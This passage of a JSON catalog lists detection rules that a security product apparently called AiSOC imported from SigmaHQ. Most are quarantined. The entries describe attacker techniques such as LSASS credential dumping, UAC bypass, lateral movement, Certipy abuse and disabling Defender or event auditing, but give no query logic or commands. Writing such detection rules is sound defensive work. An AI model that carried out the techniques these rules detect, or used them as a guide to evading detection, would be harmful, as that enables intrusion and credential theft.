AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml" } }, { "id": 
"sigmahq-sigma-676381a6-15ca-4d73-a9c8-6a22e970b90d", "type": "detection", "name": "Local Groups Discovery - Linux", "description": "Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/local-groups-discovery-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "676381a6-15ca-4d73-a9c8-6a22e970b90d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_local_groups.yml" } }, { "id": "sigmahq-sigma-6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", "type": "detection", "name": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/outlook-enableunsafeclientmailrules-setting-enabled-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", "source_commit": 
"df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" } }, { "id": "sigmahq-sigma-679085d5-f427-4484-9f58-1dc30a7c426d", "type": "detection", "name": "WinDivert Driver Load", "description": "Detects the load of the WinDivert driver, a powerful user-mode packet capture/sniffing/modification/blocking/re-injection package for Windows", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1599.001", "T1557.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windivert-driver-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "679085d5-f427-4484-9f58-1dc30a7c426d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/driver_load/driver_load_win_windivert.yml" } }, { "id": "sigmahq-sigma-67a6c006-3fbe-46a7-9074-2ba3b82c3000", "type": "detection", "name": "Path To Screensaver Binary Modified", "description": "Detects modification of the registry value that holds the path to the binary used as the screensaver.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/path-to-screensaver-binary-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly 
executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml" } }, { "id": "sigmahq-sigma-67add051-9ee7-4ad3-93ba-42935615ae8d", "type": "detection", "name": "PUA - Process Hacker Driver Load", "description": "Detects driver load of the Process Hacker tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-process-hacker-driver-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "67add051-9ee7-4ad3-93ba-42935615ae8d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/driver_load/driver_load_win_pua_process_hacker.yml" } }, { "id": "sigmahq-sigma-67bc0e75-c0a9-4cfc-8754-84a505b63c04", "type": "detection", "name": "Potentially Suspicious Child Process Of ClickOnce Application", "description": "Detects potentially suspicious child processes of a ClickOnce deployment application", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/potentially-suspicious-child-process-of-clickonce-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "67bc0e75-c0a9-4cfc-8754-84a505b63c04", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml" } }, { "id": "sigmahq-sigma-67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae", "type": "detection", "name": "Measurable Increase Of Successful Authentications", "description": "Detects when successful sign-ins increased by 10% or greater.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/measurable-increase-of-successful-authentications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_ad_auth_sucess_increase.yml" } }, { "id": "sigmahq-sigma-67f113fa-e23d-4271-befa-30113b3e08b1", "type": "detection", "name": "Suspicious JavaScript Execution Via Mshta.EXE", "description": "Detects execution of javascript code using \"mshta.exe\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, 
"playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-javascript-execution-via-mshta-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "67f113fa-e23d-4271-befa-30113b3e08b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mshta_javascript.yml" } }, { "id": "sigmahq-sigma-68050b10-e477-4377-a99b-3721b422d6ef", "type": "detection", "name": "Remote DCOM/WMI Lateral Movement", "description": "Detects remote RPC calls that perform remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.003", "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-dcom-wmi-lateral-movement.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "68050b10-e477-4377-a99b-3721b422d6ef", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml" } }, { "id": "sigmahq-sigma-6812a10b-60ea-420c-832f-dfcc33b646ba", "type": "detection", "name": "Potential PowerShell Execution Via DLL", "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll.\nThis 
detection assumes that PowerShell commands are passed via the CommandLine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-powershell-execution-via-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6812a10b-60ea-420c-832f-dfcc33b646ba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_powershell_execution_via_dll.yml" } }, { "id": "sigmahq-sigma-68578b43-65df-4f81-9a9b-92f32711a951", "type": "detection", "name": "UAC Bypass Using Windows Media Player - File", "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-windows-media-player-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "68578b43-65df-4f81-9a9b-92f32711a951", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml" } }, { "id": 
"sigmahq-sigma-68654bf0-4412-43d5-bfe8-5eaa393cd939", "type": "detection", "name": "Potential DLL Sideloading Via JsSchHlp", "description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-via-jsschhlp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "68654bf0-4412-43d5-bfe8-5eaa393cd939", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_jsschhlp.yml" } }, { "id": "sigmahq-sigma-686c0b4b-9dd3-4847-9077-d6c1bbe36fcb", "type": "detection", "name": "Windows Defender Virus Scanning Feature Disabled", "description": "Detects disabling of the Windows Defender virus scanning feature", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/windows-defender-virus-scanning-feature-disabled.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "686c0b4b-9dd3-4847-9077-d6c1bbe36fcb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_virus_scan_disabled.yml" } }, { "id": 
"sigmahq-sigma-6897cd82-6664-11ed-9022-0242ac120002", "type": "detection", "name": "PST Export Alert Using New-ComplianceSearchAction", "description": "Alerts when a user has exported the results of a compliance search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection catches PST exports even if the 'eDiscovery search or exported' alert is disabled in O365. It applies both to ExchangePowerShell usage and to exports initiated from the cloud.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pst-export-alert-using-new-compliancesearchaction.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6897cd82-6664-11ed-9022-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml" } }, { "id": "sigmahq-sigma-68b8547b-107f-43f3-97fb-900a7d63c190", "type": "detection", "name": "OpenCanary - NMAP NULL Scan", "description": "Detects instances where an OpenCanary node has been targeted by an Nmap NULL scan", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-nmap-null-scan.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { 
"source": "SigmaHQ/sigma", "source_id": "68b8547b-107f-43f3-97fb-900a7d63c190", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_portscan_nmap_null_scan.yml" } }, { "id": "sigmahq-sigma-68bcd73b-37ef-49cb-95fc-edc809730be6", "type": "detection", "name": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", "description": "Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-unquoted-service-path-reconnaissance-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "68bcd73b-37ef-49cb-95fc-edc809730be6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml" } }, { "id": "sigmahq-sigma-68c2c604-92ad-468b-bf4a-aac49adad08c", "type": "detection", "name": "HTTP Request to Low Reputation TLD or Suspicious File Extension", "description": "Detects HTTP requests to low reputation TLDs (e.g. 
.xyz, .top, .ru) or ending in suspicious file extensions (.exe, .dll, .hta), which may indicate malicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/http-request-to-low-reputation-tld-or-suspicious-file-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "68c2c604-92ad-468b-bf4a-aac49adad08c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_http_susp_file_ext_from_susp_tld.yml" } }, { "id": "sigmahq-sigma-68c8acb4-1b60-4890-8e82-3ddf7a6dba84", "type": "detection", "name": "HH.EXE Execution", "description": "Detects the execution of \"hh.exe\" to open \".chm\" files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1218.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hh-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml" } }, { "id": "sigmahq-sigma-68d37776-61db-42f5-bf54-27e87072d17e", "type": "detection", 
"name": "PUA - NPS Tunneling Tool Execution", "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-nps-tunneling-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "68d37776-61db-42f5-bf54-27e87072d17e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_nps.yml" } }, { "id": "sigmahq-sigma-6902955a-01b7-432c-b32a-6f5f81d8f625", "type": "detection", "name": "LSASS Process Dump Artefact In CrashDumps Folder", "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. 
Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-process-dump-artefact-in-crashdumps-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6902955a-01b7-432c-b32a-6f5f81d8f625", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_lsass_shtinkering.yml" } }, { "id": "sigmahq-sigma-692f0bec-83ba-4d04-af7e-e884a96059b6", "type": "detection", "name": "Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell", "description": "Detects Powershell as a child of the WmiPrvSE process. 
This could be a sign of lateral movement via WMI.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1047", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/potential-wmi-lateral-movement-wmiprvse-spawned-powershell.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "692f0bec-83ba-4d04-af7e-e884a96059b6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml" } }, { "id": "sigmahq-sigma-6938366d-8954-4ddc-baff-c830b3ba8fcd", "type": "detection", "name": "HackTool - Certipy Execution", "description": "Detects execution of Certipy, a tool for Active Directory Certificate Services enumeration and abuse, based on PE metadata characteristics and common command-line arguments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-certipy-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6938366d-8954-4ddc-baff-c830b3ba8fcd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_certipy.yml" } }, { "id": "sigmahq-sigma-693a44e9-7f26-4cb6-b787-214867672d3a", "type": "detection", "name": "Sysmon File 
Executable Creation Detected", "description": "Triggers on any Sysmon \"FileExecutableDetected\" event, which triggers every time a PE that is monitored by the config is created.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-file-executable-creation-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "693a44e9-7f26-4cb6-b787-214867672d3a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/sysmon/sysmon_file_executable_detected.yml" } }, { "id": "sigmahq-sigma-6942bd25-5970-40ab-af49-944247103358", "type": "detection", "name": "Suspicious Get Information for SMB Share - PowerShell Module", "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\nto identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-get-information-for-smb-share-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC 
engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6942bd25-5970-40ab-af49-944247103358", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml" } }, { "id": "sigmahq-sigma-69483748-1525-4a6c-95ca-90dc8d431b68", "type": "detection", "name": "Suspicious Microsoft Office Child Process - MacOS", "description": "Detects suspicious child processes spawned by Microsoft Office suite applications such as Word or Excel on macOS. This could indicate malicious macro execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.002", "T1137.002", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-microsoft-office-child-process-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "69483748-1525-4a6c-95ca-90dc8d431b68", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_office_susp_child_processes.yml" } }, { "id": "sigmahq-sigma-696bfb54-227e-4602-ac5b-30d9d2053312", "type": "detection", "name": "Veeam Backup Database Suspicious Query", "description": "Detects potentially suspicious SQL queries issued via SQLCmd against the Veeam backup databases in order to steal information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1005" ], "log_source": null, "playbook": 
null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/veeam-backup-database-suspicious-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "696bfb54-227e-4602-ac5b-30d9d2053312", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml" } }, { "id": "sigmahq-sigma-6991bc2b-ae2e-447f-bc55-3a1ba04c14e5", "type": "detection", "name": "OpenCanary - FTP Login Attempt", "description": "Detects instances where an FTP service on an OpenCanary node has had a login attempt.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-ftp-login-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6991bc2b-ae2e-447f-bc55-3a1ba04c14e5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_ftp_login_attempt.yml" } }, { "id": "sigmahq-sigma-69aeb277-f15f-4d2d-b32a-55e883609563", "type": "detection", "name": "Windows Event Auditing Disabled", "description": "Detects scenarios where system auditing (i.e.: Windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when 
Windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications - however, it is recommended to perform these modifications in Active Directory anyways.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-event-auditing-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "69aeb277-f15f-4d2d-b32a-55e883609563", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_disable_event_auditing.yml" } }, { "id": "sigmahq-sigma-69b3bd1e-b38a-462f-9a23-fbdbf63d2294", "type": "detection", "name": "Github Fork Private Repositories Setting Enabled/Cleared", "description": "Detects when the policy allowing forks of private and internal repositories is changed (enabled or cleared).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1020", "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-fork-private-repositories-setting-enabled-cleared.yaml", "quarantine_reason": 
"imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "69b3bd1e-b38a-462f-9a23-fbdbf63d2294", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_fork_private_repos_enabled_or_cleared.yml" } }, { "id": "sigmahq-sigma-69bd9b97-2be2-41b6-9816-fb08757a4d1a", "type": "detection", "name": "Potentially Suspicious Execution From Parent Process In Public Folder", "description": "Detects a potentially suspicious parent process located in the \"\\Users\\Public\" folder spawning a child process whose image or command line references shell or scripting binaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-execution-from-parent-process-in-public-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml" } 